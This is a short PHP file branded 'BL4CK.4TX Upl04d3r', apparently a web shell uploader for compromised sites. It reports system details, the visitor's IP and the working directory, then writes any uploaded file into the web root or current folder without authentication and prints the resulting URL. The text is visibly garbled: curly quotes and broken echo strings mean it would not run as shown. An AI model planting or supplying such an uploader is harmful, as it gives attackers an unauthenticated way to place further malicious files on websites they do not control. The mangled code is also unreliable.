
~[ BL4CK.4TX | Upl04d3r ]~
echo ‘ System: ‘.php_uname().’
‘;
echo “Your IP: “.$_SERVER[‘REMOTE_ADDR’].”
“;
echo ‘Directory: ‘.getcwd().’
‘;
echo “
“;
$root = $_SERVER[‘DOCUMENT_ROOT’];
$files = $_FILES[‘just_file’][‘name’];
$dest = $root.’/’.$files;
if(isset($_POST[‘upload’])) {
if(is_writable($root)) {
if(@copy($_FILES[‘just_file’][‘tmp_name’], $dest)) {
$web = “//”.$_SERVER[‘HTTP_HOST’].”/”;
echo “ $web/$files“;
} else {
echo ” }
} else {
if(@copy($_FILES[‘just_file’][‘tmp_name’], $files)) {
echo ” upload $files di folder ini”;
} else {
echo “gagal upload”;
}
}
}
?>